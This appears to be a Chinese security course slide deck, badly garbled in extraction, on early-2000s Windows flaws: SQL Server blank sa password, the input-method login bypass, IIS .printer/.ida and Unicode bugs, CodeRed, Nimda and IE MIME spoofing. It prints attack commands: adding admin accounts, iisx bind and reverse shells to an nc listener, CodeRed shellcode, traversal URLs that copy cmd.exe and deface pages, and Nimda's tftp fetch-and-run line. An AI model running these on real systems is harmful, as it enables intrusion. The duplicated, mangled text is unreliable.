Part3 典型漏洞案例

1、Case Study Windows安全問(wèn)題與對(duì)策安全問(wèn)題與對(duì)策 幾個(gè)問(wèn)題幾個(gè)問(wèn)題 MS SQL sa空口令問(wèn)題空口令問(wèn)題 輸入法漏洞輸入法漏洞 IIS的幾個(gè)重大漏洞的幾個(gè)重大漏洞 Unicode ISAP.Printer Index.ida：CodeRed、Nimda MIME的問(wèn)題（的問(wèn)題（IE、Outlook） 網(wǎng)絡(luò)蠕蟲（網(wǎng)絡(luò)蠕蟲（CodeRed、Nimda） Win2000 Server的的CheckList MS-SQL Server sa空口令空口令 微軟公司的SQL Server有一個(gè)致命的漏洞，其實(shí)是缺省安裝帶 來(lái)的，那就是數(shù)據(jù)庫(kù)超級(jí)管理員sa的缺省設(shè)置口令為空。在SQL Se

2、rver 2000之前，包括6.5和7.0版本都是如此（在安裝過(guò)程中沒(méi)有提 示輸入sa的口令），不過(guò)，在SQL Server 2000版的安裝過(guò)程中，會(huì) 提示安裝者輸入一個(gè)sa的口令。 攻擊者可能通過(guò)不設(shè)口令的sa賬號(hào) 登錄進(jìn)SQL Server。 更嚴(yán)重的是，SQL Server的master數(shù)據(jù)庫(kù)中提供一些可以對(duì)系統(tǒng) 進(jìn)行操作的擴(kuò)展存儲(chǔ)過(guò)程，具有sa身份的攻擊者當(dāng)然不會(huì)放過(guò)這個(gè) 機(jī)會(huì)，通過(guò)這些擴(kuò)展存儲(chǔ)過(guò)程，尤其是xp_cmdshell，可以執(zhí)行任何 shell命令。 因?yàn)镾QL Server服務(wù)程序的用戶身份往往是system這個(gè)特殊的本 地賬戶（或者是屬于域管理員組），它具有最高權(quán)限，可

3、以進(jìn)行諸 如創(chuàng)建一個(gè)管理員賬戶、拷貝刪除文件等操作。 net user adminhack mypass /add net localgroup administrators adminhack /add 嚴(yán)格設(shè)定sa及其他數(shù)據(jù)庫(kù)用戶的訪問(wèn)口令 刪除一些不必要的擴(kuò)展存儲(chǔ)過(guò)程，尤其是xp_cmdshell 對(duì)策對(duì)策 遠(yuǎn)程終端與輸入法攻擊遠(yuǎn)程終端與輸入法攻擊 利用輸入法漏洞攻擊利用輸入法漏洞攻擊 攻擊對(duì)象：攻擊對(duì)象： Windows 2000中文系列；中文系列； 未安裝未安裝Service Packet 2（2001.6.8） 攻擊原理：攻擊原理： 利用輸入法幫助文件的漏洞，繞過(guò)系統(tǒng)的身份認(rèn)證機(jī)制

4、，直接獲利用輸入法幫助文件的漏洞，繞過(guò)系統(tǒng)的身份認(rèn)證機(jī)制，直接獲 得系統(tǒng)文件的控制權(quán)限。得系統(tǒng)文件的控制權(quán)限。 利用輸入法漏洞攻擊利用輸入法漏洞攻擊 攻擊條件：攻擊條件： 物理上可以接觸到主機(jī)；物理上可以接觸到主機(jī)； 開(kāi)放了遠(yuǎn)程終端服務(wù)（開(kāi)放了遠(yuǎn)程終端服務(wù)（3389） 運(yùn)行運(yùn)行IIS服務(wù)服務(wù)(非必須非必須) 第一步：第一步： 使用掃描軟件發(fā)現(xiàn)遠(yuǎn)程開(kāi)放使用掃描軟件發(fā)現(xiàn)遠(yuǎn)程開(kāi)放3389端口；端口； SuperScaner； ISS 使用微軟提供的使用微軟提供的“終端服務(wù)客戶端終端服務(wù)客戶端”程序程序 只有只有“管理員管理員”權(quán)限的用戶才可以遠(yuǎn)程登陸權(quán)限的用戶才可以遠(yuǎn)程登陸 登陸時(shí)間只有一分鐘登陸時(shí)

5、間只有一分鐘 終端服務(wù)客戶端終端服務(wù)客戶端 輸入法攻擊可以達(dá)到的目的輸入法攻擊可以達(dá)到的目的 改變文件屬性或位置；改變文件屬性或位置； 直接對(duì)主頁(yè)進(jìn)行篡改直接對(duì)主頁(yè)進(jìn)行篡改 增加、激活用戶，并改變用戶權(quán)限；增加、激活用戶，并改變用戶權(quán)限； 幾個(gè)利用到的命令幾個(gè)利用到的命令 Net user myname passwd /add Net localgroup administrators myname /add Net user guest /active:yes 利用輸入法漏洞進(jìn)行攻擊利用輸入法漏洞進(jìn)行攻擊 1 2 3 4 5 6 輸入法攻擊的防御輸入法攻擊的防御 安裝2000 SP2或 NT

6、 SP6a(MS00-069 ) 只保留一種輸入法，在c:winnt目錄下刪除下 列文件 WINGB.IME WINGB.IME 內(nèi)碼輸入法內(nèi)碼輸入法 WINPY.IME WINPY.IME 全拼輸入法全拼輸入法 WINSP.IME WINSP.IME 雙拼輸入法雙拼輸入法 WINZM.IME WINZM.IME 鄭碼輸入法鄭碼輸入法 刪除輸入法的幫助文件 WINIME.CHM WINIME.CHM 輸入法操作指南輸入法操作指南 WINSP.CHM WINSP.CHM 雙拼輸入法幫助雙拼輸入法幫助 WINZM.CHM WINZM.CHM 鄭碼輸入法幫助鄭碼輸入法幫助 WINPY.CHM WIN

7、PY.CHM 全拼輸入法幫助全拼輸入法幫助 WINGB.CHM WINGB.CHM 內(nèi)碼輸入法幫助內(nèi)碼輸入法幫助 沒(méi)有必要的話，禁用遠(yuǎn)程登陸功能。 IIS的安全問(wèn)題的安全問(wèn)題 ISAPI.Printer問(wèn)題問(wèn)題 IIS ISAPI Printer遠(yuǎn)程溢出漏洞遠(yuǎn)程溢出漏洞 MS01-023漏洞公告漏洞公告 漏洞只存在運(yùn)行漏洞只存在運(yùn)行IIS5.0的的WIN2K服務(wù)器服務(wù)器 Microsoft Windows 2000 Server Microsoft Windows2000Datacenter Server Microsoft Windows 2000 Advanced Server IIS 4

8、.0不受影響不受影響 漏洞的活動(dòng)范圍漏洞的活動(dòng)范圍 這是一個(gè)緩存溢出的高風(fēng)險(xiǎn)漏洞，危害如下：這是一個(gè)緩存溢出的高風(fēng)險(xiǎn)漏洞，危害如下： 在缺省安全的情況下，該漏洞可以被來(lái)自網(wǎng)絡(luò)的入侵者利用。在缺省安全的情況下，該漏洞可以被來(lái)自網(wǎng)絡(luò)的入侵者利用。 入侵者可以完全獲得和控制存在該漏洞的網(wǎng)站服務(wù)器。入侵者可以完全獲得和控制存在該漏洞的網(wǎng)站服務(wù)器。 ISAPI擴(kuò)展擴(kuò)展 ISAPI (Internet Services Application Programming Interface)因特網(wǎng)服務(wù)應(yīng)用編程界因特網(wǎng)服務(wù)應(yīng)用編程界 面是一種能夠使網(wǎng)絡(luò)開(kāi)發(fā)商通過(guò)編寫能為網(wǎng)絡(luò)服面是一種能夠使網(wǎng)絡(luò)開(kāi)發(fā)商通過(guò)編寫能為

9、網(wǎng)絡(luò)服 務(wù)器提供新的服務(wù)的自定義命令碼來(lái)擴(kuò)展網(wǎng)絡(luò)服務(wù)器提供新的服務(wù)的自定義命令碼來(lái)擴(kuò)展網(wǎng)絡(luò)服 務(wù)器功能的一種技術(shù)。務(wù)器功能的一種技術(shù)。 該自定義命令碼既能在該自定義命令碼既能在ISAPI過(guò)濾器中完成過(guò)濾器中完成(當(dāng)新當(dāng)新 的功能所提供一種較低水平的服務(wù)時(shí)的功能所提供一種較低水平的服務(wù)時(shí))；也能在；也能在 ISAPI擴(kuò)展項(xiàng)中完成擴(kuò)展項(xiàng)中完成(當(dāng)新的功能提供一種較高水當(dāng)新的功能提供一種較高水 平服務(wù)時(shí)平服務(wù)時(shí))?，F(xiàn)在，被溢出的代碼就是這?，F(xiàn)在，被溢出的代碼就是這ISAPI擴(kuò)擴(kuò) 展。展。 ISAPI擴(kuò)展擴(kuò)展 IIS5.0IIS5.0可以執(zhí)行用戶擴(kuò)展的功能（動(dòng)態(tài)連接庫(kù)）可以執(zhí)行用戶擴(kuò)展的功能（動(dòng)態(tài)連接

10、庫(kù)） 管理員權(quán)限執(zhí)行的動(dòng)態(tài)連接庫(kù)管理員權(quán)限執(zhí)行的動(dòng)態(tài)連接庫(kù) idq.dllidq.dll httpext.dllhttpext.dll httpodbc.dllhttpodbc.dll admin.dlladmin.dll shtml.dllshtml.dll msw3prt.dll 執(zhí)行時(shí)不檢查路徑執(zhí)行時(shí)不檢查路徑 原理原理 微軟微軟Win 2K IIS 5的打印的打印ISAPI擴(kuò)展接口建立了擴(kuò)展接口建立了 .printer擴(kuò)展名到擴(kuò)展名到msw3prt.dll的映射關(guān)系，缺省的映射關(guān)系，缺省 情況下該映射存在。情況下該映射存在。 當(dāng)遠(yuǎn)程用戶提交對(duì)當(dāng)遠(yuǎn)程用戶提交對(duì).printer的的URL請(qǐng)

11、求時(shí)，請(qǐng)求時(shí)，IIS5調(diào)調(diào) 用用msw3prt.dll解釋該請(qǐng)求。解釋該請(qǐng)求。 由于由于msw3prt.dll缺乏足夠的緩沖區(qū)邊界檢查，遠(yuǎn)缺乏足夠的緩沖區(qū)邊界檢查，遠(yuǎn) 程用戶可以提交一個(gè)精心構(gòu)造的針對(duì)程用戶可以提交一個(gè)精心構(gòu)造的針對(duì).printer的的 URL請(qǐng)求，其請(qǐng)求，其“Host:”域包含大約域包含大約420字節(jié)的數(shù)字節(jié)的數(shù) 據(jù)，此時(shí)在據(jù)，此時(shí)在msw3prt.dll中發(fā)生典型的緩沖區(qū)溢出中發(fā)生典型的緩沖區(qū)溢出 ，潛在允許執(zhí)行任意代碼。，潛在允許執(zhí)行任意代碼。 原理原理 溢出發(fā)生后，溢出發(fā)生后，WEB服務(wù)停止響應(yīng)，服務(wù)停止響應(yīng)，Win 2K可以檢可以檢 查到查到WEB服務(wù)停止響應(yīng)，從而自

12、動(dòng)重啟它，因此服務(wù)停止響應(yīng)，從而自動(dòng)重啟它，因此 系統(tǒng)管理員很難意識(shí)到發(fā)生過(guò)攻擊。系統(tǒng)管理員很難意識(shí)到發(fā)生過(guò)攻擊。 這個(gè)漏洞非常危險(xiǎn)，因?yàn)樗鼉H僅需要這個(gè)漏洞非常危險(xiǎn)，因?yàn)樗鼉H僅需要WIN2000WIN2000打開(kāi)打開(kāi) 8080端口端口( (http)http)或者或者443443端口端口( (https)https)，微軟公司強(qiáng)烈微軟公司強(qiáng)烈 要求在未打補(bǔ)丁之前一定要移除要求在未打補(bǔ)丁之前一定要移除ISAPIISAPI網(wǎng)絡(luò)打印的網(wǎng)絡(luò)打印的 映射。映射。 攻擊辦法攻擊辦法 1、小榕的、小榕的IIS5Exploit（jill.c) 2、提供的提供的iis5hack 3、提供的提供的

13、iisx 攻擊辦法攻擊辦法 1、小榕的、小榕的IIS5Exploit（jill.c)略略 2、提供的提供的iis5hack 下載地址下載地址/mysoft/iis5hack.zip 運(yùn)行參數(shù)運(yùn)行參數(shù):iis5hack 目標(biāo)主機(jī)將開(kāi)放目標(biāo)主機(jī)將開(kāi)放99端口端口 攻擊辦法攻擊辦法 使用方法使用方法: iisx sp: 0 - 目標(biāo)沒(méi)有安裝目標(biāo)沒(méi)有安裝SP , 1 - 目標(biāo)安裝了目標(biāo)安裝了SP1 -p - iisx 98 1 p-p - iisx 98 1 p 在在98192.168

14、.6.198上開(kāi)一個(gè)端口上開(kāi)一個(gè)端口7788,可以直接可以直接telnet 98 98 7788 -a - iisx 98 1 -a-a - iisx 98 1 -a 在在9898上添加一個(gè)管理員帳號(hào)：上添加一個(gè)管理員帳號(hào)：hax，其密碼也為其密碼也為hax, 可以使用可以使用net use 98 98 ipc$ hax /user:hax建立建立 連接。連接。 攻擊辦法攻擊辦法 - -r - r - 反向連接（類似于反

15、向連接（類似于jilljill的方式），具體實(shí)施方法如下：的方式），具體實(shí)施方法如下： 例如先在一臺(tái)機(jī)器例如先在一臺(tái)機(jī)器5050上運(yùn)行上運(yùn)行nc -vv -l -p 5432,nc -vv -l -p 5432, 然后對(duì)攻擊目標(biāo)運(yùn)行然后對(duì)攻擊目標(biāo)運(yùn)行iisx 98 1 -r 50 iisx 98 1 -r 50 5432,5432, 這時(shí)在這時(shí)在5050就會(huì)出現(xiàn)來(lái)自就會(huì)出現(xiàn)來(lái)自9的連接。的連接。 檢測(cè)

16、辦法檢測(cè)辦法 發(fā)布的發(fā)布的EasyScan 發(fā)布的發(fā)布的x-scaner 自己編寫一個(gè)自己編寫一個(gè)Perl 的掃描軟件的掃描軟件 通過(guò)發(fā)送通過(guò)發(fā)送GET /NULL.printer HTTP/1.0n請(qǐng)求，然后傳送一超長(zhǎng)請(qǐng)求，然后傳送一超長(zhǎng) 字符串給目標(biāo)主機(jī)，去檢測(cè)是否存在字符串給目標(biāo)主機(jī)，去檢測(cè)是否存在.printer漏洞。漏洞。 ISS Internet ScannerSystem Scanner 解決辦法解決辦法 安全微軟針對(duì)這漏洞發(fā)的補(bǔ)?。喊踩④涐槍?duì)這漏洞發(fā)的補(bǔ)?。?http:/ D=29321 （或或SP2) 手動(dòng)方式設(shè)置服務(wù)器：手動(dòng)方式設(shè)置服務(wù)器：

17、設(shè)置設(shè)置控制面板控制面板管理工具管理工具INTERNET服務(wù)管理器服務(wù)管理器右鍵單擊右鍵單擊 你的站點(diǎn)你的站點(diǎn)如我的是如我的是2000server屬性屬性編輯編輯WWW服務(wù)服務(wù)主目主目 錄錄配置配置應(yīng)用程序配置應(yīng)用程序配置找到找到.printer清除清除 ISAPI .ida/.idq漏洞與漏洞與 CodeRed IIS ISAPI Idq遠(yuǎn)程溢出漏洞遠(yuǎn)程溢出漏洞 MS01-033漏洞公告漏洞公告 漏洞存在于所有運(yùn)行漏洞存在于所有運(yùn)行Index Service的系統(tǒng)上。的系統(tǒng)上。 同樣是一個(gè)遠(yuǎn)程緩存溢出漏洞；同樣是一個(gè)遠(yuǎn)程緩存溢出漏洞； 由由Eeyes公司最早發(fā)現(xiàn)；公司最早發(fā)現(xiàn)； CodeRe

18、d蠕蟲主要利用該漏洞傳播；蠕蟲主要利用該漏洞傳播； 修 補(bǔ) 方 案 為 在 安 裝修 補(bǔ) 方 案 為 在 安 裝 S P 2 的 基 礎(chǔ) 上 ， 安 裝的 基 礎(chǔ) 上 ， 安 裝 Q300972_W2K_SP3_X86_cn(en).exe Shell Code Codered worm shellcode /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN

19、NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00 %u531 b%u53ff%u0078%u0000%u00=a GET /default.ida?之后有之后有224個(gè)相同的字母?jìng)€(gè)相同的字母請(qǐng)求數(shù)據(jù)請(qǐng)求數(shù)據(jù) 報(bào)；報(bào)； CodeRed 蠕蟲的

20、三部曲蠕蟲的三部曲 感染：感染： Checks to see if it has already infected this system by verifying the existence of the CodeRed II atom. Checks the default system language, and spawns threads for propagation. “Chinese, 600 threads, 48 hours, rest 2 day. Otherwise, 300 threads, 24 hours, rest 1 days. 蠕蟲的三部曲蠕蟲的三部曲 傳播

21、傳播 Version 1: Deface web page in memory, not file. Static seed to generate random IP. F.g. random() function Version 2: Dont deface web page. Pseudo random IP. Different random IP pattern: 1/8: random, 1/2 : same A class, 3/8 : same B class. 蠕蟲的三部曲蠕蟲的三部曲 攜帶攜帶 蠕蟲會(huì)有計(jì)劃的把蠕蟲會(huì)有計(jì)劃的把cmd.exe 以以root.exe的名字復(fù)制到

22、的名字復(fù)制到msadc 和和 scripts 目錄下，更名為目錄下，更名為root.exe,成為了一個(gè)可怕的后門。成為了一個(gè)可怕的后門。 將蠕蟲中包含的一段將蠕蟲中包含的一段2進(jìn)制代碼拆離成文件名為進(jìn)制代碼拆離成文件名為explore.exe的木馬的木馬 到本地的驅(qū)動(dòng)器到本地的驅(qū)動(dòng)器(c:和和d:)。 通過(guò)修改注冊(cè)表，把通過(guò)修改注冊(cè)表，把c:，d:變成變成iis的虛擬目錄。的虛擬目錄。 過(guò)程過(guò)程 Detection C:explorer.exe Detection C:inetpubscriptsroot.exe IIS服務(wù)器的服務(wù)器的Unicode漏洞漏洞 IIS4.0或IIS5.0在對(duì)客戶

23、端遞交的URL串里 包含的Unicode字符進(jìn)行解碼過(guò)程中存在問(wèn)題 ，如果用戶提供一些特殊的Unicode編碼，將 導(dǎo)致IIS錯(cuò)誤的打開(kāi)或者執(zhí)行某些Web根目錄以 外的文件（程序）。 這是一個(gè)典型的通過(guò)Web服務(wù)器攻擊獲得 Windows系統(tǒng)訪問(wèn)權(quán)的漏洞，其影響的系統(tǒng)包 括Windows 2000+IIS5.0（安裝了SP1的系統(tǒng)也 在受害之列），以及Windows NT+IIS4.0（安 裝了SP5和SP6a的系統(tǒng)也在受害之列）。 一個(gè)普通的ASCII字符“/”或者“”，正常情況 下，如果“明目張膽”的出現(xiàn)在客戶端提交的URL中 ，肯定會(huì)被Web服務(wù)器過(guò)濾掉的（因?yàn)檫@是危險(xiǎn)字符 之一）。但是

24、，如果是經(jīng)過(guò)Unicode編碼過(guò)的，Web服 務(wù)器過(guò)濾后發(fā)現(xiàn)沒(méi)有危險(xiǎn)字符存在，接下來(lái)就會(huì)對(duì)其 解碼（Web服務(wù)器并不理會(huì)該字符是否是超長(zhǎng)編碼） ，但解碼后就不再進(jìn)行過(guò)濾了，這樣一來(lái)，“狡猾” 的攻擊者就可以騙過(guò)Web服務(wù)器的路徑檢查，去執(zhí)行 或?yàn)g覽任意的文件。具體來(lái)說(shuō)，“/”的編碼是 “0 xC1 0 x1C”，“”的編碼是“0 xC0 0 x2F”，在 URL參數(shù)行提交時(shí)，應(yīng)該分別表示成“%C1%1C”和 “%C0%2F”。 http:/xxx.xxx.xxx.xxx/scripts/.%c1%1c./winnt/system32/cmd .exe?/c+copy+c:winntsystem

25、32cmd.exe+c:inetpubscriptsroot.exe http:/xxx.xxx.xxx.xxx/scripts/root.exe?/c+echo+Hacked by scriptkits+c:inetpubwwwrootdefault.asp 篡改網(wǎng)站主頁(yè)篡改網(wǎng)站主頁(yè) 微軟公司發(fā)布了針對(duì)Unicode漏洞的熱補(bǔ)丁，其下載地址是： Microsoft IIS 4.0： http:/ fault.asp Microsoft IIS 5.0： http:/ ault.asp 對(duì)Windows 2000+IIS5.0用戶來(lái)說(shuō)，安裝SP2是最好的選擇。 此外，在IIS服務(wù)器的配置上，管

26、理員應(yīng)該慎重，如果不需要腳本執(zhí)行的 目錄，就應(yīng)該刪除IIS缺省安裝時(shí)建立的一些目錄，例如scripts、_vti_bin、 msadc等等。還有一點(diǎn)要注意的，在安裝IIS服務(wù)器時(shí)，最好將其安裝在與操 作系統(tǒng)安裝目錄分離的磁盤上 對(duì)策對(duì)策 Nimda網(wǎng)絡(luò)蠕蟲網(wǎng)絡(luò)蠕蟲 Nimda蠕蟲蠕蟲 nimdanimdaadminadmin 蠕蟲蠕蟲+ +病毒病毒 受影響的系統(tǒng)受影響的系統(tǒng) Microsoft Windows 95Microsoft Windows 95 Microsoft Windows 98Microsoft Windows 98 Microsoft Windows MEMicrosoft

27、 Windows ME Microsoft Windows NT 4.0Microsoft Windows NT 4.0 Microsoft Windows 2000Microsoft Windows 2000 Microsoft Windows XPMicrosoft Windows XP 大?。捍笮。?734457344字節(jié)字節(jié) Nimda蠕蟲文件蠕蟲文件 mmc.exe 出現(xiàn)在出現(xiàn)在windows文件夾，蠕蟲掃描和創(chuàng)建文件夾，蠕蟲掃描和創(chuàng)建tftpd的的 進(jìn)程就是它。注意進(jìn)程就是它。注意windows系統(tǒng)文件夾里也有一系統(tǒng)文件夾里也有一 個(gè)個(gè)mmc.exe，那不是那不是Nimda。 ri

28、ched20.dll riched20.dll除了出現(xiàn)在除了出現(xiàn)在windows系統(tǒng)文件夾里，系統(tǒng)文件夾里， 還可能出現(xiàn)在任何有還可能出現(xiàn)在任何有*.doc文件的文件夾里。因?yàn)槲募奈募A里。因?yàn)?它是它是winword.exe和和wordpad.exe運(yùn)行時(shí)都要調(diào)用運(yùn)行時(shí)都要調(diào)用 的所以當(dāng)打開(kāi)的所以當(dāng)打開(kāi)DOC文件時(shí)就等于運(yùn)行了文件時(shí)就等于運(yùn)行了Nimda。 Nimda蠕蟲文件蠕蟲文件 Admin.dll Admin.dll除了在除了在C:，D:，E:的根目錄外還可出現(xiàn)的根目錄外還可出現(xiàn) 在下面的在下面的TFTP*出現(xiàn)的地方出現(xiàn)的地方 load.exe 出現(xiàn)在出現(xiàn)在windows系統(tǒng)文件夾系

29、統(tǒng)文件夾 readme.eml readme.eml readme.nws readme.nws Nimda蠕蟲蠕蟲傳播方式傳播方式 通過(guò)通過(guò)email 在在internet臨時(shí)文件夾中讀取所有臨時(shí)文件夾中讀取所有htm，html文件并文件并 從中提取從中提取email地址，從信箱讀取地址，從信箱讀取email并從中提取并從中提取 SMTP服務(wù)器，然后發(fā)送服務(wù)器，然后發(fā)送readme.eml。 通過(guò)通過(guò)unicode_holeunicode_hole或或CodeRedIICodeRedII建立的建立的root.exeroot.exe 一旦發(fā)現(xiàn)有弱點(diǎn)的系統(tǒng)就使用類似下面的命令一旦發(fā)現(xiàn)有弱點(diǎn)的系統(tǒng)

30、就使用類似下面的命令 GET/scripts/root.exe?/c+tftp-GET/scripts/root.exe?/c+tftp- ixxx.xxx.xxx.xxxGETAdmin.dllHTTP/1.0 ixxx.xxx.xxx.xxxGETAdmin.dllHTTP/1.0 把文件傳到主機(jī)上去，然后再把文件傳到主機(jī)上去，然后再 GET/scripts/Admin.dllHTTP/1.0 GET/scripts/Admin.dllHTTP/1.0 Nimda蠕蟲蠕蟲傳播方式傳播方式 瀏覽被篡改網(wǎng)頁(yè)瀏覽被篡改網(wǎng)頁(yè) 通過(guò)局域網(wǎng)通過(guò)局域網(wǎng) Nimda會(huì)搜索本地的共享目錄中包含會(huì)搜索本地的共

31、享目錄中包含doc文件的目文件的目 錄，一但找到，就會(huì)把自身復(fù)制到目錄中命名為錄，一但找到，就會(huì)把自身復(fù)制到目錄中命名為 riched20.dll（原理見(jiàn)前）原理見(jiàn)前） Nimda蠕蟲蠕蟲啟動(dòng)方式啟動(dòng)方式 病毒采取以下措施確保自己處于活躍狀態(tài)病毒采取以下措施確保自己處于活躍狀態(tài) 1 1）把自己復(fù)制到）把自己復(fù)制到windowswindows系統(tǒng)文件夾里命名為系統(tǒng)文件夾里命名為 riched20.dllriched20.dll（原理見(jiàn)前）原理見(jiàn)前） 2 2）把自己復(fù)制到）把自己復(fù)制到windowswindows系統(tǒng)文件夾里命名為系統(tǒng)文件夾里命名為 load.exeload.exe， 修改修改sy

32、stem.inisystem.ini把把 shell=explorer.exeshell=explorer.exe改為改為 shell=explorer.exeload.exe-dontrunold shell=explorer.exeload.exe-dontrunold 使病毒在下次系統(tǒng)啟動(dòng)時(shí)運(yùn)行。使病毒在下次系統(tǒng)啟動(dòng)時(shí)運(yùn)行。 Nimda蠕蟲蠕蟲的后門的后門 guestguest用戶被激活并被加到管理員組用戶被激活并被加到管理員組 C C盤被設(shè)為完全共享，共享名為盤被設(shè)為完全共享，共享名為C$C$ 如何清除如何清除Nimda蠕蟲蠕蟲 在文件夾選項(xiàng)里設(shè)置在文件夾選項(xiàng)里設(shè)置“顯示所有文件顯示所

33、有文件” ” 刪除刪除mmc.exemmc.exe；load.exeload.exe；riched20.dllriched20.dll；admin.dlladmin.dll； readme.emlreadme.eml；readme.exereadme.exe等所有蠕蟲文件。等所有蠕蟲文件。 從原始安裝盤中提取從原始安裝盤中提取riched20.dllriched20.dll覆蓋覆蓋windowswindows系統(tǒng)文件夾里系統(tǒng)文件夾里 的同名蠕蟲文件。的同名蠕蟲文件。 檢查所有大小為檢查所有大小為5734457344或或7922579225的文件。的文件。 可以使用可以使用“查找查找”工具，搜索

34、包含工具，搜索包含“fsdhqherwqi2001”fsdhqherwqi2001”的的 * *. .exe/exe/* *.dll.dll和包含和包含“Kz29vb29oWsrLPh4eisrPb09Pb2”Kz29vb29oWsrLPh4eisrPb09Pb2”的的 * *. .eml/eml/* *.nws.nws。 檢查檢查system.inisystem.ini。 檢查所有文件名中包含檢查所有文件名中包含default/index/main/readmedefault/index/main/readme并且擴(kuò)展并且擴(kuò)展 名為名為htm/html/asphtm/html/asp的文件。

35、的文件。 刪除刪除C:C:的共享的共享 如何避免如何避免Nimda入侵入侵 根本之道是打補(bǔ)?。焊局朗谴蜓a(bǔ)?。?UnicodeUnicode漏洞：漏洞：ms00-078.aspms00-078.asp MIMEMIME漏洞：漏洞：ms01-020.asp ms01-020.asp IE5.01SP2IE5.01SP2： IE5.5SP2IE5.5SP2： IdqIdq漏洞漏洞 其他解決方案：其他解決方案： 打開(kāi)打開(kāi)IEIE的的“工具工具-internetinternet選項(xiàng)選項(xiàng)-安全安全-自定義級(jí)別自定義級(jí)別-文件下載文件下載”選選 “禁用禁用”。 刪除所有不需要的默認(rèn)虛擬目錄，或者只給純腳

36、本執(zhí)行權(quán)，最好不要把任刪除所有不需要的默認(rèn)虛擬目錄，或者只給純腳本執(zhí)行權(quán)，最好不要把任 何何webweb目錄放在系統(tǒng)分區(qū)。目錄放在系統(tǒng)分區(qū)。 檢查共享設(shè)置，檢查共享設(shè)置，Win9XWin9X的機(jī)器不要開(kāi)完全共享，可以開(kāi)只讀共享，所有共享的機(jī)器不要開(kāi)完全共享，可以開(kāi)只讀共享，所有共享 都要設(shè)置口令。都要設(shè)置口令。 Nimda的作者是誰(shuí)的作者是誰(shuí) 程序的作者在程序中留下了以下標(biāo)記：程序的作者在程序中留下了以下標(biāo)記： fsdhqherwqi2001 fsdhqherwqi2001 ConceptVirus(CV)V.5,Copyright(C)2001R.P.China ConceptVirus(C

37、V)V.5,Copyright(C)2001R.P.China 可能對(duì)最終找出作者有幫助?？赡軐?duì)最終找出作者有幫助。 為什么說(shuō)為什么說(shuō)Nimda是是“概念概念”蠕蟲蠕蟲 它可以通過(guò)至少五種方式傳播它可以通過(guò)至少五種方式傳播 它是一個(gè)帶它是一個(gè)帶exeexe擴(kuò)展名的擴(kuò)展名的dlldll，可以做為可執(zhí)行文件可以做為可執(zhí)行文件 運(yùn)行，也可作為運(yùn)行，也可作為dlldll運(yùn)行。運(yùn)行。 它會(huì)把自己的屬性設(shè)為它會(huì)把自己的屬性設(shè)為“系統(tǒng)系統(tǒng)”“”“隱藏隱藏”，再改寫，再改寫 注冊(cè)表，使注冊(cè)表，使“系統(tǒng)系統(tǒng)”“”“隱藏隱藏”屬性的程序在資源管屬性的程序在資源管 理器中不可見(jiàn)。理器中不可見(jiàn)。 它是一個(gè)主機(jī)掃描器，

38、一個(gè)弱點(diǎn)掃描器，一個(gè)后門它是一個(gè)主機(jī)掃描器，一個(gè)弱點(diǎn)掃描器，一個(gè)后門 程序；帶有多個(gè)程序；帶有多個(gè)ExploitExploit，掌握最新的安全信息；掌握最新的安全信息； 它就是一個(gè)黑客。它就是一個(gè)黑客。 。 MIME的安全問(wèn)題的安全問(wèn)題 IE與OutLook MIME的基本概念的基本概念 MIME是是Multipurpose Internet Mail Extension的縮寫，起初定義為在的縮寫，起初定義為在Intemet電電 子信件中的編碼方法，現(xiàn)在它已經(jīng)演化成一子信件中的編碼方法，現(xiàn)在它已經(jīng)演化成一 種指定文件類型種指定文件類型(Internet的任何形式的消息的任何形式的消息 ：e-m

39、ail，usenet新聞和新聞和Web)的通用方法。的通用方法。 MIME類型工作原理類型工作原理 比較典型的比較典型的MIME類型一般是類型一般是text/html； image/gif；video/quicktime； application/postscript等一組標(biāo)準(zhǔn)的等一組標(biāo)準(zhǔn)的MIME類類 型。型。 瀏覽器通常也有一個(gè)瀏覽器通常也有一個(gè)MIMEMIME類型的對(duì)照表。這樣類型的對(duì)照表。這樣 瀏覽器從瀏覽器從WebWeb服務(wù)器得到的文件時(shí)，從服務(wù)器得到的文件時(shí)，從 Content-typeContent-type頭得到的值與瀏覽器的頭得到的值與瀏覽器的MIMEMIME表匹表匹 配。配

40、。 IE的問(wèn)題的問(wèn)題 一般情況下如果附件是文本文件，一般情況下如果附件是文本文件，IE會(huì)讀它會(huì)讀它 ，如果是，如果是VIDEO CLIP，IE會(huì)查看，如果是圖會(huì)查看，如果是圖 形文件，形文件，IE就會(huì)顯示它，但如果是一個(gè)就會(huì)顯示它，但如果是一個(gè)EXE 文件，文件，IE就會(huì)提示用戶是否執(zhí)行。就會(huì)提示用戶是否執(zhí)行。 攻擊者可以建立一個(gè)包含可執(zhí)行文件的附件攻擊者可以建立一個(gè)包含可執(zhí)行文件的附件 的的HTML EMAIL并修改并修改MIME頭，使頭，使IE不正不正 確處理這個(gè)確處理這個(gè)MIME所指定的執(zhí)行文件附件。所指定的執(zhí)行文件附件。 IE的問(wèn)題的問(wèn)題 -=_-=_ABC1234567890DEF_

41、= ABC1234567890DEF_= Content-Type:audio/x-wav; Content-Type:audio/x-wav; name=readme.exe name=readme.exe Content-Transfer-Encoding:base64 Content-Transfer-Encoding:base64 Content-ID: Content-ID: 當(dāng)攻擊者更改當(dāng)攻擊者更改MIME類型后，類型后，IE就會(huì)不經(jīng)過(guò)提就會(huì)不經(jīng)過(guò)提 示用戶是否執(zhí)行而直接運(yùn)行，從而使攻擊者示用戶是否執(zhí)行而直接運(yùn)行，從而使攻擊者 加在附件中的程序或者攻擊命令能夠按照攻加在附件中的程序

42、或者攻擊命令能夠按照攻 擊者設(shè)想的情況實(shí)行。擊者設(shè)想的情況實(shí)行。 From: xxxxx Subject: mail Date: Thu, 2 Nov 2000 13:27:33 +0100 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary=1 X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 -1 Content-Type: multipart/alternative; boundary=2 -2 Content-

